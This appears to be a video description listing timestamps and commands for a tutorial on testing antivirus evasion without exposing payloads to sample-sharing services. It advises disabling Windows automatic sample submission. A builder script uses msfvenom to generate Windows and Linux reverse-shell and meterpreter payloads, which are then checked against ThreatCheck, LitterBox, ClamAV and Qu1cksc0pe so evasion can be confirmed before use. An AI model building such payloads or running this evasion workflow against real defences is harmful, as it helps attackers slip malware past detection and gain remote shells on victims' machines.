Скачать или смотреть How To Test/Verify Anti Virus Evasion Techniques Without Burning Them.

0:00 Intro
0:19 Intro Alternative to Virus Total: KleenScan Bit
0:33 Demo One - Windows CMD Tool (ThreatCheck)
2:28 Demo One - Windows GUI Python Tool (LitterBox)
5:39 Demo Two - Linux CLI Tool (clamscan)
8:08 Demo Two - Linux CLI Tool (Qu1cksc0pe)
10:46 Demo Two - Linux CLI Tool (Qu1cksc0pe) // With Extra Yara Rules
12:15 The End - Thanks For Watching

Oh and Don't Forget these before testing:

Windows: Disable Automatic Sample Submission
To prevent Windows from burning your stuff when testing

---

Intro Alternative to Virus Total

https://kleenscan.com

---

Demo One Commands - Windows Only Tooling

Creating the fail.exe test binary

msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=8443 -f raw -o basic.bin

heap_ratoon_v2_fail.sh -g basic.bin -o fail.exe

Failed OBF Tool Project Using During Demo one

https://github.com/OreoByte/cookies_a...

Threat Check Commands from demo one

https://github.com/rasta-mouse/Threat...

.\ThreatCheck.exe -f /path/to/file/fail.exe

Other Windows CMD Tooling

https://github.com/BlackSnufkin/CheckPlz
https://github.com/matterpreter/Defen...
https://github.com/gatariee/gocheck
https://github.com/RythmStick/AMSITri...

Litter Box commands from demo one

git clone https://github.com/BlackSnufkin/Litte...
cd litterbox
pip install -r requirements.txt

launching from Admin CMD prompt without leaving your keyboard

1. Windows Key
2. Search Box: cmd
3. Ctrl + Shift + Enter
4. Arrow over to yes and click Enter

start Litter Box

python litterbox.py


---

Demo Two Commands - Linux Tooling for Multi OS File Analysis

Builder shell script for that part of the demo

#!/bin/bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=eth0 lport=8443 -f exe -o msf_win.exe
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=8443 -f exe -o win.exe
msfvenom -p linux/x64/shell_reverse_tcp lhost=eth0 lport=8443 -f elf -o lin.elf

ClamAV Commands from the second demo

apt search clamav
sudo apt install clamav

sudo freshclam

clamscan /path/to/file
clamscan win.exe

Qu1cksc0pe Commands from the second demo
https://github.com/CYB3RMX/Qu1cksc0pe

git clone --depth 1 https://github.com/CYB3RMX/Qu1cksc0pe...
cd Qu1cksc0pe

docker build -t qu1cksc0pe .

docker run -it --rm qu1cksc0pe:latest -h "Command Args"
docker run -it --rm -v /local/file/path:/docker/file/path qu1cksc0pe:latest "Command Args"

docker run -it --rm -v ~/www/:/data qu1cksc0pe:latest -h
docker run -it --rm qu1cksc0pe:latest -h

docker run -it --rm -v ~/www/:/data qu1cksc0pe:latest --db_update
docker run -it --rm qu1cksc0pe:latest --db_update

docker run -it --rm -v ~/www:/data qu1cksc0pe:latest --file /data/fail.exe --analyze
docker run -it --rm -v $(pwd):/data qu1cksc0pe:latest --file /data/win.exe --analyze

Qu1chsc0pe with extra Yara Rules during Demo 2

git clone https://github.com/thewhiteninja/yara...
cd ./yarasploit/windows

cp *.yar ./Qu1cksc0pe/Systems/Windows/YaraRules_Windows/

rebuild container to make sure Yara Rules are in the updated docker container.

docker build -t qu1cksc0pe .

Use qu1cksc0pe like before

docker run -it --rm qu1cksc0pe:latest -h "Command Args"
docker run -it --rm -v /local/file/path:/docker/file/path qu1cksc0pe:latest "Command Args"